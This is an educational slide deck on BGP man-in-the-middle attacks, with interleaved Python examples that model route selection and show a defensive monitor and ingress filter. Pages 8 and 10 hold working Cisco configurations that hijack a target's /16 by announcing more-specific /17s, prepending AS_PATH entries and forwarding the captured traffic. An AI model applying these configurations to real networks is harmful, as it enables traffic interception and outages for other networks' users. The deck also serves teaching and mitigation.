BGP Man in the Middle Attack Jason Froehlich December 10, 2008


Page 1: BGP Man in the Middle Attack

BGP Man in the Middle Attack

Jason Froehlich

December 10, 2008

Page 2: BGP Man in the Middle Attack

What is BGP?

Routing for whole Internet

Autonomous Systems (AS)

Classless Interdomain Routing (CIDR)

190.100.0.0/16 = network 190.100.0.0, netmask 255.255.0.0

Page 3: BGP Man in the Middle Attack

How BGP Works

AS Border Router - “BGP Speaker”

Advertise own routes, redistribute others

Update Messages

“AS_PATH” field

Path Selection

Most “Specific” Network

190.100.0.0/17 over 190.100.0.0/16
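The "most specific network wins" rule is the mechanism the rest of the deck relies on, so here is a small added illustration (not code from the slides): a toy Loc-RIB holding the legitimate 190.100.0.0/16 from AS100 alongside two /17 halves, and a lookup that shows every destination in the /16 is now forwarded according to the /17 entries. The AS_PATH lists attached to the entries are constructed for the example.

```python
"""Longest-prefix-match route selection, as an added example.

Models a tiny BGP Loc-RIB as (prefix, AS_PATH) pairs. The /16 and the
origin ASes come from the slides; the AS_PATH contents are constructed.
"""
import ipaddress

# Constructed sample RIB: AS100 originates the /16, AS900 originates the
# two /17 halves that together cover exactly the same address space.
RIB = [
    ("190.100.0.0/16", [300, 100]),
    ("190.100.0.0/17", [900]),
    ("190.100.128.0/17", [900]),
]


def select_route(dest, rib):
    """Return (prefix, as_path) of the most specific entry covering dest.

    Returns None when no entry covers the address. The AS_PATH is not
    consulted at all: once a longer prefix exists, it wins outright.
    """
    addr = ipaddress.ip_address(dest)
    best = None
    for prefix, as_path in rib:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, as_path)
    if best is None:
        return None
    return str(best[0]), best[1]


def more_specific_halves(prefix):
    """Split a prefix into the two halves one bit longer (e.g. /16 -> two /17s).

    Announcing both halves shadows the parent for every address it covers,
    which is why two /17s were enough in the slides' scenario.
    """
    net = ipaddress.ip_network(prefix)
    return [str(half) for half in net.subnets(prefixlen_diff=1)]


if __name__ == "__main__":
    for dest in ("190.100.5.5", "190.100.200.1"):
        print(dest, "->", select_route(dest, RIB))
    print("with only the /16:", select_route("190.100.5.5", RIB[:1]))
    print("halves of /16:", more_specific_halves("190.100.0.0/16"))
```

Running it shows that the /16 entry is still in the table but is never chosen once the two /17 entries are present.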

Page 4: BGP Man in the Middle Attack

The Man in the Middle Attack

Requirements:

Redirect all traffic to Attacker

Forward traffic onto Target

Relies on trust built into BGP

Page 5: BGP Man in the Middle Attack

Attack Threats

Confidentiality

Capture all packets

Integrity

Modify packets before delivery

Availability

Black Hole

Filtering selected packets

Page 6: BGP Man in the Middle Attack

Implementation

190.100.0.0/16 (AS100) is Target

AS900 is Attacker

Page 7: BGP Man in the Middle Attack

Implementation – Step 1

Advertise New Routes

More specific

190.100.0.0/17, 190.100.128.0/17

Page 8: BGP Man in the Middle Attack

Implementation – Step 1

! AS900's BGP process originates the two /17 halves of the target's /16
router bgp 900
 network 190.100.0.0 mask 255.255.128.0
 network 190.100.128.0 mask 255.255.128.0
 ...
 ! eBGP sessions to the attacker's upstreams
 neighbor <ip address of AS600 router> remote-as 600
 neighbor <ip address of AS700 router> remote-as 700
 neighbor <ip address of AS800 router> remote-as 800
 ! keep the /17s from being summarised back into a classful network
 no auto-summary

Page 9: BGP Man in the Middle Attack

Implementation – Step 2

Create Route Back to Target

Modify “AS_PATH” field of advertisement

Add each AS in route to target

Page 10: BGP Man in the Middle Attack

Implementation – Step 2

! match the target's address space
ip prefix-list victim permit 190.100.0.0/16
! prepend the ASes on the path back to the target so that each of them
! rejects the advertisement as a loop and keeps its original route
route-map mitm permit 10
 match ip address prefix-list victim
 set as-path prepend 600 300 100
! static routes forwarding the captured traffic on towards the target via AS600
ip route 190.100.0.0 255.255.128.0 <ip address of AS600 rtr>
ip route 190.100.128.0 255.255.128.0 <ip address of AS600 rtr>

Page 11: BGP Man in the Middle Attack

Attack Limitations

Access to BGP Router

No script kiddies, but pool still large

Half of the Conversation

Only sees Inbound traffic

Resolve: 2nd BGP MITM, Other MITM (DNS)

Incomplete Route Distribution

ASes in the return path do not see the new route

Page 12: BGP Man in the Middle Attack

Attack Limitations cont.

Packet Route Visible

Traceroute

Resolve: TTL Modification

BGP Updates Visible

Alert a perceptive Administrator

Encrypted Traffic

Cannot decrypt payload

Page 13: BGP Man in the Middle Attack

Mitigating the Attack - Prevention

Filtering

Must be done by every ISP

Internet Routing Registry

Overhead

Poor Database Maintenance / Security

Page 14: BGP Man in the Middle Attack

Mitigating the Attack - Detection

Monitor for BGP Updates

BGPmon.net
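The filtering on the previous slide and the monitoring on this one both start from the same data: a record of which prefixes an operator is entitled to announce, from which origin AS, and how specific its own announcements ever get (the information an IRR route object carries). The Python below is an added example, not code from the slides or from BGPmon; it assumes a registry with those three fields plus the set of upstream ASes that may legitimately sit next to the origin, and feeds it constructed update records of the kind a route collector exposes (prefix and AS_PATH, as seen from AS800). The customer prefix 203.0.113.0/24 for AS900 is constructed. It shows why an origin check alone is not enough against the deck's Step 2: the prepended path ends in AS100, so only the more-specific check fires.

```python
"""Added example: registry-driven BGP update monitoring and ingress filtering."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class RouteObject:
    """What an operator registers for its own space (IRR route-object style).

    Fields other than prefix/origin_as are this example's assumptions:
    max_length is the longest prefix the operator itself announces, and
    upstreams are the ASes allowed to appear directly before origin_as.
    """
    prefix: str
    origin_as: int
    max_length: int
    upstreams: frozenset = frozenset()


# The target's registration (prefix and AS from the slides; AS300 as its
# only upstream is taken from the slides' prepended path 600 300 100).
REGISTRY = [RouteObject("190.100.0.0/16", 100, 16, frozenset({300}))]

# Constructed: what AS900 is actually entitled to announce to its ISPs.
CUSTOMER_AS900 = [RouteObject("203.0.113.0/24", 900, 24)]


def check_update(prefix, as_path, registry=REGISTRY):
    """Return (code, detail) alerts for one announcement; [] means nothing odd."""
    net = ipaddress.ip_network(prefix)
    origin = as_path[-1]
    alerts = []
    for ro in registry:
        parent = ipaddress.ip_network(ro.prefix)
        if net.version != parent.version or not net.subnet_of(parent):
            continue  # not our address space, nothing to say
        if origin != ro.origin_as:
            alerts.append(("ORIGIN_MISMATCH",
                           f"{prefix} originated by AS{origin}, registered to AS{ro.origin_as}"))
        if net.prefixlen > ro.max_length:
            alerts.append(("MORE_SPECIFIC",
                           f"{prefix} is more specific than registered {ro.prefix}"))
        # Even with the right origin, the AS next to it should be a known upstream.
        if origin == ro.origin_as and len(as_path) >= 2 and ro.upstreams \
                and as_path[-2] not in ro.upstreams:
            alerts.append(("UNEXPECTED_UPSTREAM",
                           f"AS{as_path[-2]} adjacent to AS{origin} in path {as_path}"))
    return alerts


def ingress_accept(prefix, as_path, customer_objects):
    """ISP-side filter: accept a customer announcement only if it is registered.

    This is the per-ISP filtering the deck asks for; an unregistered /17
    from AS900 is dropped at the first hop instead of propagating.
    """
    net = ipaddress.ip_network(prefix)
    for ro in customer_objects:
        parent = ipaddress.ip_network(ro.prefix)
        if (net.version == parent.version and net.subnet_of(parent)
                and net.prefixlen <= ro.max_length and as_path[-1] == ro.origin_as):
            return True
    return False


# Constructed sample updates, in the order a collector in AS800 might see them.
SAMPLE_UPDATES = [
    ("190.100.0.0/16", [700, 300, 100]),          # normal route
    ("190.100.0.0/17", [800, 900, 600, 300, 100]),  # the deck's Step 1 + Step 2
    ("190.100.0.0/16", [800, 900]),               # plain origin hijack
    ("10.0.0.0/8", [800, 900]),                   # unrelated space
]

if __name__ == "__main__":
    for prefix, path in SAMPLE_UPDATES:
        print(prefix, path, check_update(prefix, path) or "ok")
    print("AS600 accepts 190.100.0.0/17 from AS900?",
          ingress_accept("190.100.0.0/17", [900], CUSTOMER_AS900))
```

The second sample update is the one to look at: its path ends in the legitimate AS100 and passes through AS100's real upstream, so only the prefix-length comparison against the operator's own registration catches it. That is the check a monitoring service for your own address space must make, and it is also the check that the ISP-side filter performs before the announcement can spread at all.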

Page 15: BGP Man in the Middle Attack

Mitigating the Attack - Response

Counter-Attack

Advertise even more specific networks

ISP Disconnect Attacker

May take hours to days

Youtube.com – February 2008

Page 16: BGP Man in the Middle Attack

Mitigating the Attack – Securing BGP

S-BGP

2 Certificates – IP address, AS

Secure Origin BGP

Topologies

Interdomain Route Validation

Out of band verification

Page 17: BGP Man in the Middle Attack

Conclusion

BGP Man in the Middle

Powerful Attack

Easy to Implement

Difficult to Mitigate